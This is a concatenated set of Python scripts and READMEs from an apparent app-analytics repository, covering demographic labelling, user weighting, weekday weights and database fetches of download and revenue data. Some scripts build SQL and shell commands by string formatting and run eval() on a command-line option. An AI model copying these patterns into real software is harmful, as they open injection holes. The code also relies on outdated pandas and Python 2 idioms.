return filter_device_demographics(adx, device_ids, platform)
def combine_demographic_sources(demographics, platform=None):
"""
Combine demographic sources and get results per device.
Note: filters devices demographics and only returns demographic columns
common to all sources.
:param demographics: List with demographics (e.g. [adx, questionnaire])
:param platform: String with platform ('iOS', 'iPhone' or 'iPad') (DEPRECATED)
:return: DataFrame with combined demographics
"""
common_columns = demographics[0].columns
source_list = []
for source in demographics:
device_ids = source.device_id.unique()
filtered_source = filter_device_demographics(source, device_ids, platform)
source_list.append(filtered_source)
common_columns = common_columns.intersection(filtered_source.columns)
combined_sources = pd.concat((s[common_columns] for s in source_list),
axis=0, ignore_index=True)
combined_sources.sort(['device_id', 'date'], inplace=True)
combined_sources.drop_duplicates('device_id', take_last=True, inplace=True)
return combined_sources
def get_usage_per_device(usage, device_ids, start_date, end_date):
"""
Get usage per device in a time range.
:param usage: DataFrame with usage
:param device_ids: IDs to get usage for
:param start_date: datetime with start date
:param end_date: datetime with end date
:return DataFrame with usage per device
"""
filtered_usage = _filter_usage(usage, device_ids, start_date, end_date)
filtered_usage['dummy'] = 1
device_usage = pd.pivot_table(filtered_usage, values='dummy', index='device_id', columns='bundle_id',
aggfunc='max', fill_value=0)
return device_usage.astype(USAGE_DEVICE_DATA_TYPE)
def _filter_usage(usage, device_ids, start_date, end_date):
"""
Filter usage by allowed device IDs and period.
:param usage: DataFrame with usage
:param device_ids: List of relevant device ID's
:param start_date: datetime with start date
:param end_date: datetime with end date
:return DataFrame with valid usage
"""
# Cut-off by range.
is_in_valid_range = ((usage.date >= start_date) & (usage.date <= end_date))
usage_in_range = usage[is_in_valid_range]
    # Keep only the devices that were specified.
is_device_usage = usage_in_range.device_id.isin(device_ids)
    # Keep usage for devices that are both in range and specified.
valid_usage = usage_in_range[is_device_usage]
return valid_usage
def construct_labels(demographics, device_ids, modality, label_encoder=None):
"""
    Construct labels for a modality from demographics data (with support for cross labels for multi-modality).
:param demographics: Demographics data (see e.g. data.load_adx())
:param device_ids: Device ID's to construct labels for.
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
    :param label_encoder: LabelEncoder used for encoding
    :return DataFrame with labels, LabelEncoder used for encoding
"""
has_known_values = demographics[modality.keys()].notnull().all(axis=1)
indexed_demographics = demographics.ix[has_known_values].set_index('device_id').copy()
temp_labels, label_encoder = _construct_modality_labels(indexed_demographics, modality, label_encoder)
is_specified_device = temp_labels.index.intersection(device_ids)
return temp_labels.ix[is_specified_device].copy(), label_encoder
def construct_labels_adx(*args):
"""
Deprecated function, use construct_labels instead.
"""
warnings.warn("This function has been deprecated, use construct_labels() instead.")
return construct_labels(*args)
def _construct_modality_labels(df, modality, label_encoder=None):
"""
Construct labels for a modality (with support for cross labels for multi-modality).
:param df: DataFrame with modality keys as columns and modality value as values
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
    :param label_encoder: LabelEncoder used for encoding
    :return DataFrame with labels, LabelEncoder used for encoding
"""
has_known_values = df[modality.keys()].notnull().all(axis=1)
temp_df = df.ix[has_known_values, modality.keys()].copy()
temp_df['dummy'] = ''
modalities = []
for ii, m in enumerate(modality.keys()):
current_modalities = ['not_' + modality[m], modality[m]]
if ii > 0:
temp_df['dummy'] += '&'
modalities = ['&'.join(p) for p in product(modalities, current_modalities)]
else:
modalities = current_modalities
is_in_bucket = temp_df[m] == modality[m]
temp_df.loc[~is_in_bucket, 'dummy'] += current_modalities[0]
temp_df.loc[is_in_bucket, 'dummy'] += current_modalities[1]
    if label_encoder is None:
label_encoder = OrderedLabelEncoder(modalities)
labels = pd.Series(label_encoder.transform(temp_df.dummy), index=temp_df.index)
return labels, label_encoder
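# Illustrative note: for modality {'gender': 'male', 'age_bin': '13-24'} and
# 'gender' iterated first, the generated cross labels are
# 'not_male&not_13-24', 'not_male&13-24', 'male&not_13-24' and 'male&13-24',
# encoded in that order by the OrderedLabelEncoder.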
def split_users(df, labels):
"""
Split DataFrame for known and unknown users.
:param df: DataFrame with the index containing users
:param labels: Labels with the index containing known users
:return tuple with df split for known and unknown users
"""
known_df = df.loc[labels.index]
unknown_idx = df.index.difference(labels.index)
unknown_df = df.loc[unknown_idx]
assert (pd.concat([known_df, labels], axis=1).shape[0] == len(labels)), 'DataFrame not properly aligned with labels'
return known_df, unknown_df
def align_bundle_ids(df, bundle_ids):
"""
Align DataFrame with bundle ID's:
- add missing columns and fill with zero's
- remove columns not in bundle_ids
- reorder columns to follow bundle_ids
:param df: DataFrame
:param bundle_ids: Index of bundle_ids
:return Adjusted DataFrame
"""
temp = df
missing_bundle_ids = bundle_ids.difference(temp.columns)
# Add DataFrame with zeros.
temp = pd.concat([pd.DataFrame(0, index=df.index, columns=missing_bundle_ids), df], axis=1)
return temp[bundle_ids] # Rearrange
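# Illustrative note: aligning a frame with columns ['b', 'c'] to a bundle_ids
# Index(['a', 'b']) drops 'c', adds an all-zero column 'a' and returns the
# columns ordered as ['a', 'b'].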
def get_period_data(usage, devices, demographics, platform, start_date, end_date, modality):
"""
Get valid usage data for a period.
:param usage: Usage (see data.load_usage())
:param devices: Device info (see data.load_devices())
:param demographics: Demographics data (see e.g. data.load_adx())
:param platform: String with platform ('iOS', 'iPhone' or 'iPad')
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: tuple with all usage, labeled usage, unlabeled usage, labels, and label encoder
"""
device_usage, relevant_demographics = filter_data(usage, devices, demographics, platform, start_date, end_date)
# Only keep users with age and gender present
    is_not_missing = relevant_demographics[['age_bin', 'gender']].notnull().all(axis=1)
relevant_demographics = relevant_demographics[is_not_missing]
dataset = construct_dataset(device_usage, relevant_demographics, modality)
known_data, unknown_data, labels, label_encoder = dataset
return device_usage, known_data, unknown_data, labels, label_encoder
def get_latest_active_known_usage(usage, devices, demographics, platform):
"""
Get last week/month of usage for active devices with known demographics.
:param usage: Usage (see data.load_usage())
:param devices: Device info (see data.load_devices())
:param demographics: Demographics data (see e.g. data.load_adx())
:param platform: String ('iOS', 'iPhone' or 'iPad')
:return DataFrame with last period of usage per active device with known demographics
"""
platform_devices = _get_platform_devices(devices, platform)
demographics_platform = filter_device_demographics(demographics, platform_devices.device_id.unique())
is_known_device = usage.device_id.isin(demographics_platform.device_id)
latest_device_date = (usage
.loc[is_known_device, ['device_id', 'date']]
.sort(['device_id', 'date'])
.drop_duplicates('device_id', take_last=True))
time_frame_usage = pd.merge(usage.loc[is_known_device], latest_device_date, on=['device_id', 'date'])
time_frame_usage['dummy'] = 1
latest_usage = pd.pivot_table(time_frame_usage, values='dummy', index='device_id',
columns='bundle_id', aggfunc='max', fill_value=0)
return latest_usage.astype(USAGE_DEVICE_DATA_TYPE)
def get_latest_active_adx_usage(*args):
warnings.warn("This function has been deprecated, use get_latest_active_known_usage() instead.",
DeprecationWarning)
return get_latest_active_known_usage(*args)
def get_latest_active_date(device_ids, time_frame):
"""
Get latest active date for specified devices for weekly or monthly time frame.
:param device_ids: List of relevant device ID's
:param time_frame: 'weekly' or 'monthly'
:return: DataFrame with last active data for each active device
"""
active_devices = data.load_all_active_devices(time_frame)
is_valid_device = active_devices.device_id.isin(device_ids)
selected_active_devices = active_devices.ix[is_valid_device]
selected_active_devices.sort(['device_id', 'end_date'], inplace=True)
selected_active_devices.drop_duplicates('device_id', take_last=True, inplace=True)
return selected_active_devices.reset_index(drop=True)
<file_sep>/aa_au_model/correction/estimate.py
__author__ = 'hgriffioen'
import numpy as np
import pandas as pd
import process
SURVEY_PATH = 'data/survey_data.csv'
def compute_user_weights(probabilities, target_distribution):
"""
Compute weight to convert estimated to target population.
:param probabilities: Probabilities of estimated population (m x n, n as number of bins)
:param target_distribution: Target population distribution (n x 1)
    :return Series weights for each user (m x 1)
"""
factors = compute_adjustment_factor(probabilities, target_distribution)
user_weights = (probabilities * factors).sum(axis=1)
return user_weights
def compute_adjustment_factor(probabilities, target_distribution):
"""
Compute population adjustment factor.
:param probabilities: Probabilities of estimated population (m x n, n as number of bins)
:param target_distribution: Target population distribution (1 x n)
:return adjustment factor for each bin
"""
bin_sums = probabilities.sum(axis=0)
distribution = bin_sums * 1. / bin_sums.sum()
return target_distribution / distribution
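# Illustrative note (made-up numbers): with two bins, an estimated
# distribution of [0.25, 0.75] and a target of [0.5, 0.5] give adjustment
# factors [2.0, 0.667]. compute_user_weights() then mixes these per user, e.g.
# probabilities [0.8, 0.2] yield a weight of 0.8*2.0 + 0.2*0.667 = 1.73.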
def _convert_fraction_to_distribution(fraction):
"""
Convert fraction to distribution.
:param fraction: Fraction f for the label
:return array with [1-f, f]
"""
return np.array([1 - fraction, fraction])
def compute_survey_distribution(platform, modality, label_encoder=None):
"""
Get survey data for a platform and modality.
:param platform: String ('iOS', 'iPhone' or 'iPad')
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:param label_encoder: LabelEncoder to use for encoding
:returns Series with distribution over modalities
"""
survey = pd.read_csv(SURVEY_PATH)
in_bin, label_encoder = process._construct_modality_labels(survey, modality, label_encoder)
bin_sums = survey.groupby(in_bin)[platform].sum()
return (bin_sums / bin_sums.sum()), label_encoder
def compute_active_users(usage, user_weights=None):
"""
Compute number of active users of an app.
:param usage: DataFrame with user x app usage
:param user_weights: Series with weights for each user (if None default AU's are computed)
:return: Active users for each app
"""
if user_weights is None:
df = usage.mean()
else:
        assert np.all(user_weights.ix[usage.index].shape == user_weights.shape)
df = usage.T.dot(user_weights.ix[usage.index]) * 1. / user_weights.sum()
return df
def compute_composition(usage, user_probabilities):
"""
Compute composition for each app.
:param usage: DataFrame with user x app usage
:param user_probabilities: DataFrame with probabilities for each user
:return: Expected composition for each app
"""
expected_count = usage.T.dot(user_probabilities)
expected_composition = expected_count.divide(expected_count.sum(axis=1), axis='rows')
return expected_composition
def compute_apps_unweighted(usage, user_labels=None):
"""
Compute unweighted app estimates.
:param usage: DataFrame with user x app usage
:param user_labels: Series with binary labels for each user
if labels stats should be computed
:return count and fraction of AU's and labels
"""
# Compute AU
au_count = usage.sum()
au_fraction = au_count * 1. / usage.shape[0]
user_ix = usage.index
if user_labels is not None:
assert np.all(user_labels.ix[user_ix].shape == user_labels.shape)
label_count = usage.T.dot(user_labels.ix[user_ix])
label_fraction = label_count * 1. / au_count
else:
label_count = np.nan
label_fraction = np.nan
df = pd.DataFrame({'au_n_original': au_count,
'au_f_original': au_fraction,
'label_n_original': label_count,
'label_f_original': label_fraction})
return df
def compute_apps_weighted(usage, user_labels, user_weights):
"""
Compute weighted app estimates.
:param usage: DataFrame with user x app usage
:param user_labels: Series with binary labels for each user
:param user_weights: Series with weights for each user
:return count and fraction of weighted AU's
"""
assert np.all(user_labels.ix[usage.index].shape == user_labels.shape)
au_count = usage.T.dot(user_weights.ix[usage.index])
au_fraction = au_count * 1. / user_weights.sum()
labeled_user_ix = user_labels.index[user_labels == 1]
label_count = usage.ix[labeled_user_ix].T.dot(user_weights.ix[labeled_user_ix])
label_fraction = label_count / au_count
df = pd.DataFrame({'au_n_adjusted': np.round(au_count),
'au_f_adjusted': au_fraction,
'label_n_adjusted': np.round(label_count),
'label_f_adjusted': label_fraction})
return df
def compute_active_user_composition(usage, active_users, user_probability):
"""
    Compute the composition of active users (i.e. the distribution over buckets).
:param usage: DataFrame with user x app usage
:param active_users: Active users stats per app
:param user_probability: Bucket probabilities for each user
:return: DataFrame with active user composition
"""
modality_distribution = compute_composition(usage, user_probability)
active_user_composition = modality_distribution.multiply(active_users,
axis='rows')
active_user_composition['all'] = active_users
return active_user_composition
<file_sep>/google-analytics/README.md
# This is the sub-module for the Google Analytics Benchmark
Development of v2.0 is starting. The version number is aligned with the Google Analytics data. On 10/18/2015, the GA data dump in the s3 mount point (DS environment) became ready. We are going to:
1. Run a sanity check of the new GA data v2.0 versus GA data v1.1
2. Reimplement the model training scenarios on GA data v2.0
3. Build outlier detection/metrics to measure GA data quality
---
v0.1 was moved to 'deprecated' due to a known bug in the Google Analytics scrapers.
The new version is v1.1, with newly pulled data from Google Analytics.
We have started machine learning tasks and put them into new folders. Simply speaking, the machine learning focuses on the signals (GA MAU) from Google Analytics and learns patterns from MyDM features, for example duration length, time since launch, etc., for better correction/prediction of the current MyDM estimations (MyDM MAU).
<file_sep>/weekly_weights/weights.py
'''
Created on May 13, 2013
@author: perezrafael
'''
import pandas as pd
from dateutil.relativedelta import relativedelta
import os
from datetime import datetime
from datetime import timedelta
import psycopg2
from pandas.io import sql
import config
import sys
from joblib import Parallel, delayed
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
FDATE = '%Y-%m-%d'
FLAT_WEEK = pd.DataFrame({'weekday':[0, 1, 2, 3, 4, 5, 6],
'weight':[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]})
def daterange(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
def get_reals_from_db(store_id, platform, unit, start_date, end_date, min_units):
''' Load actuals from db
'''
db_name = None
query = None
table_name = None
column_name = None
extra_bit = ''
if unit == 'downloads':
table_name = 'downloads'
column_name = 'units'
elif unit == 'usd':
table_name = 'sales'
column_name = 'revenue'
extra_bit = 'as units'
if platform == 'ios':
db_name = 'aa_staging'
query = "SELECT app_id, date, store_id, %s %s FROM %s WHERE store_id=%s AND date>='%s' AND date<='%s' AND %s>=%s"%(column_name, extra_bit, table_name, store_id, start_date, end_date, column_name, min_units)
elif platform=='android':
db_name = 'aa_staging_android'
query = "SELECT app_class as app_id, date, store_id, %s %s FROM %s WHERE store_id=%s AND date>='%s' AND date<='%s' AND %s>=%s"%(column_name, extra_bit, table_name, store_id, start_date, end_date, column_name, min_units)
#print query
conn = psycopg2.connect("dbname=%s user=aa host=nile"%db_name)
df = sql.frame_query(query, con=conn)
conn.close()
return df
def append_weekdays(df):
''' Check each weekday for each date and append it
'''
dates = df[['date']].drop_duplicates()
if isinstance(dates['date'][:1][0], str):
dates['date'] = dates['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
dates['weekday'] = dates['date'].apply(lambda x: x.weekday())
df = df.merge(dates, on='date')
return df
def get_medians_per_weekday(df, min):
df = df[df['units']>=min]
medians = df.groupby(['store_id', 'unit', 'weekday']).median().reset_index()
return medians
def get_std_distance(df, column):
gdf = df.groupby(['store_id', 'unit'])
result = []
for n,g in gdf:
g['%s_std_distance_to_median'%column] = (g[column] - g[column].median())/g[column].std()
result.append(g)
return pd.concat(result)
def cap_weights(df, bottom=0.7, top=1.5):
while any(df['weight'].values < bottom):
df['new_weight'] = df['weight']
#print df
df['new_weight'][df['weight']<bottom] = bottom
#print df
#print df['weight'] - ((df['new_weight'].sum() - df['weight'].sum())/df[df['weight']>bottom].shape[0])
df['new_weight'][df['weight']>bottom] = df['weight'] - ((df['new_weight'].sum() - df['weight'].sum())/df[df['weight']>bottom].shape[0])
#print df
df = df.drop('weight', axis=1)
df.rename(columns={'new_weight':'weight'}, inplace=True)
while any(df['weight'].values > top):
df['new_weight'] = df['weight']
#print df
df['new_weight'][df['weight']>top] = top
#print df
#print df['weight'] - ((df['new_weight'].sum() - df['weight'].sum())/df[df['weight']<top].shape[0])
df['new_weight'][df['weight']<top] = df['weight'] + ((df['weight'].sum() - df['new_weight'].sum())/df[df['weight']<top].shape[0])
#print df
df = df.drop('weight', axis=1)
df.rename(columns={'new_weight':'weight'}, inplace=True)
return df
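# Illustrative note (made-up numbers): weights [0.5, 1.0, 1.5] with bottom=0.7
# are first clamped to [0.7, 1.0, 1.5]; the surplus of 0.2 is then subtracted
# evenly from the unclamped days so the weekly sum is preserved, giving
# [0.7, 0.9, 1.4].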
def get_values_per_order(df, position):
''' Get the weights for each day of the week,
if there is no value for the required position
return an empty dataframe
'''
gdf = df.groupby(['store_id', 'unit', 'date'])
# if gdf.size().max() < position:
#return df.merge(FLAT_WEEK, on='weekday')
# return pd.DataFrame()
weekday_count = df.drop('date', axis=1).groupby(['store_id', 'unit', 'weekday']).size().reset_index()
weekday_count.rename(columns={0:'count'}, inplace=True)
weekday_count = get_std_distance(weekday_count, 'count')
weekday_values = pd.DataFrame()
for n, g in gdf:
g.sort('units', ascending=False, inplace=True)
if g.shape[0]>=position:
values = g[position-1:position][['store_id', 'unit', 'weekday', 'units']]
weekday_values = weekday_values.append(values)
if weekday_values.shape[0]>0:
weekday_values = weekday_values.groupby(['store_id', 'unit', 'weekday'])
weekday_values = weekday_values.mean().reset_index()
#weekday_values = get_std_distance(weekday_values, 'units')
#weekday_values['units'][weekday_values['units_std_distance_to_median']<=-0.4]=weekday_values['units'].mean()
#weekday_values['units'][weekday_values['units_std_distance_to_median']>=1.5]=weekday_values['units']-(weekday_values['units'].std()-2.0)
weekly_mean = weekday_values.groupby(['store_id', 'unit']).mean().reset_index()
weekly_mean.rename(columns={'units':'weekly_mean'}, inplace=True)
weekly_mean = weekly_mean[['store_id', 'unit', 'weekly_mean']]
weekday_values = weekday_values.merge(weekly_mean, on=['store_id', 'unit'])
weekday_values['weight'] = weekday_values['units'] / weekday_values['weekly_mean'].astype(float)
weekday_values = cap_weights(weekday_values, 0.7, 1.5)
weekday_values = weekday_values.merge(weekday_count, on=['store_id', 'unit', 'weekday'])
return weekday_values
def calculate_weights(df, start_period, end_period):
''' Wrapper to get_values_per_order,
appends start and end of period
'''
df = df[df['date'] >= start_period]
df = df[df['date'] <= end_period]
index = df[['date', 'store_id', 'weekday', 'unit']].drop_duplicates()
dates = df[['date', 'weekday']].drop_duplicates()
dates['start_period'] = start_period.strftime(FDATE)
dates['end_period'] = end_period.strftime(FDATE)
v = get_values_per_order(df,100)
if v.shape[0]>0:
v['start_period'] = start_period.strftime(FDATE)
v['end_period'] = end_period.strftime(FDATE)
v = v.merge(dates, on=['weekday', 'start_period', 'end_period'])
else:
v = pd.DataFrame(columns=['count', 'date', 'end_period', 'start_period', 'weekday', 'weekly_mean'])
v = v.merge(df.drop('app_id', axis=1), on=['date', 'weekday'], how='right')
#v = v.merge(index, on=['date', 'store_id', 'weekday', 'unit'], how='right')
v = v.merge(FLAT_WEEK, on='weekday', how='right')
v['units'] = None
v['start_period'] = start_period.strftime(FDATE)
v['end_period'] = end_period.strftime(FDATE)
v = v.drop_duplicates()
return v
def cluster_countries():
pass
def _run(country, platform, unit, start_date, end_date):
vs = pd.DataFrame()
current_end_period = start_date + relativedelta(days=6)
while (current_end_period <= end_date):
current_start_period = current_end_period - relativedelta(days=6)
print(current_start_period)
print(current_end_period)
print(country, platform, unit)
df = get_reals_from_db(country, platform, unit, current_start_period.strftime(FDATE), current_end_period.strftime(FDATE), 0)
if df.shape[0] == 0:
current_end_period += relativedelta(days=7)
continue
df = append_weekdays(df)
df['unit'] = unit
v = calculate_weights(df, current_start_period.date(), current_end_period.date())
if v.shape[0]>0:
vs = vs.append(v)
current_end_period += relativedelta(days=7)
return vs
if __name__ == '__main__':
'''python weights.py android 2012-01-02 2012-01-10
argv[1] = platform (ios or android)
argv[2] = start_date
argv[3] = end_date
argv[4] = store_id
argv[5] = debug (generate debug data or not)
The script will start on start date and count 7 days from it,
then generate weights for each week after that.
E.g. if start_date is Sunday, it will generate weekly weights
for Sunday-Saturday weeks.
If start_date is Wednesday, the week will be considered
Wednesday-Tuesday.
If end_date is not the considered end of a week, the final week
will be the last week when we have all 7 days.
'''
platform = sys.argv[1]
start_date = sys.argv[2]
end_date = sys.argv[3]
store_id = sys.argv[4]
debug = sys.argv[5]
if platform =='ios':
countries = config.IOS_STORES_DICT.keys()
elif platform == 'android':
countries = config.ANDROID_STORES_DICT.keys()
else:
print 'Wrong platform'
exit(1)
if store_id != 'all':
countries = [int(store_id)]
#countries = [45,46,47,48]
units = ['downloads', 'usd']
values = []
str_start_date = start_date
str_end_date = end_date
start_date = datetime.strptime(start_date, FDATE)
end_date = datetime.strptime(end_date, FDATE)
values = Parallel(n_jobs=20)(delayed(_run)(country, platform, unit, start_date, end_date)
for country in countries for unit in units)
#for country in countries:
# for unit in units:
# values.append(_run(country, platform, unit, start_date, end_date))
result = pd.DataFrame()
for value in values:
if value.shape[0]>0:
result = result.append(value)
if debug != 'debug':
result = result[['date', 'weight', 'store_id', 'unit']]
result = result.sort(['unit', 'store_id', 'date'])
result.to_csv('weights_%s_%s_%s_%s.csv'%(platform, store_id, str_start_date, str_end_date), index=False)
#result = result.dropna()
#result = result[result['store_id']==9]
#result = result[result['unit']=='usd']
gdf = result.groupby(['unit', 'store_id'])
for n,g in gdf:
#g['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in g['date']]
plt.clf()
fig = plt.figure(figsize=(int(g.shape[0]/3),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
plt.plot(g['date'], g['weight'], '-')
plt.gcf().autofmt_xdate()
plt.title(str(n))
ax.grid()
plt.savefig('./plots/%s.png'%str(n))
#plt.show()
<file_sep>/evaluation/py/fetch_real_values.py
"""
Fetch real values from the database.
Arguments:
-p The platform config to use.
"""
## Author: <NAME> <<EMAIL>>
import os.path
import os
import commands
import itertools
from internal.args import parse_options
from internal import utilities_date
from internal import utilities_pandas
config_ios = {
## It's recommended to symlink the file here.
'db_info': {'host': 'nile',
'db_name': 'aa_staging',
'username': 'aa'}
}
config_android = {
'db_info': {'host': 'nile',
'db_name': 'aa_staging_android',
'username': 'aa'}
}
def main():
opts, args = parse_options()
# Get the options.
stores = opts.stores
dtstart = opts.daterange[0]
dtend = opts.daterange[1]
units_types = opts.units_types
# Load platform-dependent config.
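    # e.g. a -p value of 'ios' (or 'ios_us') selects config_ios via the prefix
    # before '_'; 'android' selects config_android.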
config = eval('config_%s' % opts.platform.split('_')[0].lower())
db_info = config['db_info']
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
# Iterate through (stores, feeds, dts).
for (store, unit) in itertools.product(stores, units_types):
df = _fetch_from_db(store, unit, dts_daily[0], dts_daily[-1], db_info)
if df.shape[0] < 1:
df = _fetch_from_dwh(store, unit, dts_daily[0], dts_daily[-1], db_info)
csv_filename = os.path.join(args[0], "%s_%s_%s--%s.csv" % (store, unit,
dts_daily[0],
dts_daily[-1]))
df.rename(columns={'revenue': 'units'}, inplace=True)
df.to_csv(csv_filename, index=False)
def _fetch_from_dwh(store, unit, dtstart, dtend, db_info):
common_suffix = 'WHERE store_id=%s ' % store + \
'AND date >= DATE(\'%s\') ' % dtstart + \
'AND date <= DATE(\'%s\'))' % dtend
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, app_id, units FROM downloads ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, app_id, revenue FROM sales ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
else:
raise Exception('Unit types should be Downloads or USD')
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
def _fetch_from_db(store, unit, dtstart, dtend, db_info):
common_suffix = 'WHERE d.store_id=%s ' % store + \
'AND d.date >= DATE(\'%s\') ' % dtstart + \
'AND d.date <= DATE(\'%s\'))' % dtend
if 'android' in db_info['db_name']:
app_id = 'app_class'
else:
app_id = 'app_id'
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, %s as app_id, units FROM downloads d '%app_id + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, %s as app_id, revenue FROM sales d '%app_id + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
else:
raise Exception('Unit types should be Downloads or USD')
print(cmd)
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
if __name__ == '__main__':
main()
<file_sep>/old_investigations/README.md
# Author
- <NAME> <<EMAIL>, <EMAIL>>
# Data Preparation
## Method
Before doing anything meaningful, you have to fetch the related data from the remote data source. Currently, we use Mark's script for fetching daily estimations, and psql for real values.
To fetch the estimations and real values and combine them, run the script `run_fetch_and_concat.py`.
The join of estimations and real values is an **inner** join, so the data is kept only when we have both an estimation and a real value for each (day, app, category, feed) combination.
## Usage
To use all the scripts, we first have to use `run_fetch_and_concat.py` to fetch and concatenate the daily data produced by Mark's script.
### Options:
* -s: Required. A list of the stores that you want to calculate, separated by comma. e.g. 143441,143444,143462,143465,143466
* -d: Required. Date range, could be a single month(e.g. 2012-09), a range of months(e.g. 2012-04--2012-05) or a range of days(e.g. 2012-03-02--2012-07-08)
* -u: Required. A list of type of units to inspect (Downloads or USD), separated by comma. e.g. Downloads,USD
* -x: Optional. Whether to overwrite the existing caches.
### Examples:
python run_fetch_and_concat.py -s 143441,143444,143462,143465,143466 -d 2012-09 -u Downloads,USD
### Results
- The program will generate some caches to avoid the pain of re-downloading. They will be in the `cache` directory.
- The concatenated data will be in the `data` directory.
# SDA
## Method
On each day, each app can be ranked in different categories (Overall, Games, etc.) and feeds (iPhone Free, iPad Paid, etc.). As long as we have a rank, we can get an estimation.
On each day, for each app and each category, we sum the estimations from the different feeds.
- For Downloads, sum the estimations from iPhone FREE, iPhone PAID, iPad FREE, iPad PAID.
- For USD, sum the estimations from iPhone GROSSING, iPad GROSSING.
In the program this is done through `groupby` on the fields `App ID` and `Unit` in `internal/calculate_sda.py`.
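
A minimal pandas sketch of this summation (illustrative only; `df` is assumed to be the concatenated data from `run_fetch_and_concat.py`, and all column names except `App ID` and `Unit` are assumptions):

    import pandas as pd
    # one estimate per (day, app, category, unit), summed over feeds
    summed = df.groupby(['date', 'App ID', 'category', 'Unit'],
                        as_index=False)['estimate'].sum()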
After summation, we get a single estimation per day, per app, and per category (for Downloads and USD respectively). On each day, for each app, the following estimations are picked across categories (see the sketch after the list):
- estimate_dailyworst: Pick the estimation that is the worst across categories, compared with the real values.
- estimate_avg: Average the estimations from different categories.
- estimate_overall: Pick the estimation from the Overall category. Note that there will be many missing estimations for lower-ranked apps.
- units_avg: The real values, obtained by averaging across categories (they should all be the same).
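
An illustrative sketch of these picks (assuming a frame `summed` as in the sketch above, plus a `units` column with the real values; column names are assumptions):

    summed['abs_error'] = (summed['estimate'] - summed['units']).abs()
    grouped = summed.groupby(['date', 'App ID', 'Unit'])
    estimate_avg = grouped['estimate'].mean()
    # worst pick: the estimate with the largest absolute error vs. the real value
    estimate_dailyworst = summed.loc[grouped['abs_error'].idxmax(), 'estimate']
    # overall pick: only the estimates coming from the Overall category
    estimate_overall = summed[summed['category'] == 'Overall']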
## Usage
Use the script `run_calculate_sda.py`
### Options:
* -d Required. Downloads data, generated by `run_fetch_and_concat.py`
* -u Required. USD data, generated by `run_fetch_and_concat.py`
* -r Optional. Reference file, which contains the apps that we care about.
Downloads data and USD data should be the files generated by `run_fetch_and_concat.py`.
The reference file contains the current best estimation (monthly). With that we can join SDA with the reference file for comparison. If it is not specified, we generate SDA for all apps.
**All these files should be in the same country and same period, otherwise it makes no sense.**
### Examples:
python run_calculate_sda.py -d data/United\ States_2012-09-01--2012-09-30_Downloads.csv -u data/United\ States_2012-09-01--2012-09-30_USD.csv -r Rafael_request/United\ States/AppAnnie_Estimates.csv
### Results:
- The generated SDA data will be in the `sda` directory, with both daily and aggregated files. A column named `both_real_estimate_num` is added to the aggregated files, indicating on how many days we have both real values and estimations.
# Provision and Extensions
To extend the scripts to Android or another data source, we need to get estimations and real values from that source's database.
## Estimation
For estimation, please check the `_run_daily_basis_script` function in `internal/monthly_concater.py`. The program expects a daily script that accepts a (store_id, feed_id, date) combination, and output a CSV. For the current daily script (written by <NAME>), we have the following formats:
- Parameters:
-s[store] -f[feed] -d[date]
- Output example:
category_id,rank,app_id,estimate
36,1,432849519,25006
36,2,419396407,23158
36,3,343200656,22141
So to minimize the pain, a new daily script for another data source should satisfy the same input & output format; a minimal sketch follows.
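A minimal sketch of such a script (the fetch function is a placeholder to be implemented against the new data source):

    import argparse
    import sys

    def fetch_estimates(store, feed, date):
        # Placeholder: query the new data source here and return
        # (category_id, rank, app_id, estimate) tuples.
        return []

    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument('-s', dest='store', required=True)
        parser.add_argument('-f', dest='feed', required=True)
        parser.add_argument('-d', dest='date', required=True)
        args = parser.parse_args()
        sys.stdout.write('category_id,rank,app_id,estimate\n')
        for row in fetch_estimates(args.store, args.feed, args.date):
            sys.stdout.write('%s,%s,%s,%s\n' % row)

    if __name__ == '__main__':
        main()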
## Real Values
The real values are fetched in the `fetch_real_units_reference` function of `run_fetch_and_concat.py`. It is based on psql and fetches data on a monthly basis, one (store_id, month) combination at a time.
And it will generate two files for each combination, one Downloads and one USD.
For another data source, the same (store_id, month) combination should be accepted, and the output is expected to look as follows for **Downloads**:
date,app_id,units
2012-09-01,475136005,1
2012-09-01,478896989,3
...
2012-09-30,460186290,7
2012-09-30,384303098,2
2012-09-30,511836156,6
For **USD**, the final column is expected to be *revenue* instead of *units*:
date,app_id,revenue
2012-09-01,475136005,0.7
2012-09-01,486408199,1.4
2012-09-01,441712648,35
...
2012-09-30,492044257,8.4
2012-09-30,484573159,4.9
2012-09-30,512622577,0.7
# Plots
Plots are generated based on SDA (daily or monthly). Please specify the SDA file as the argument to the plot script.
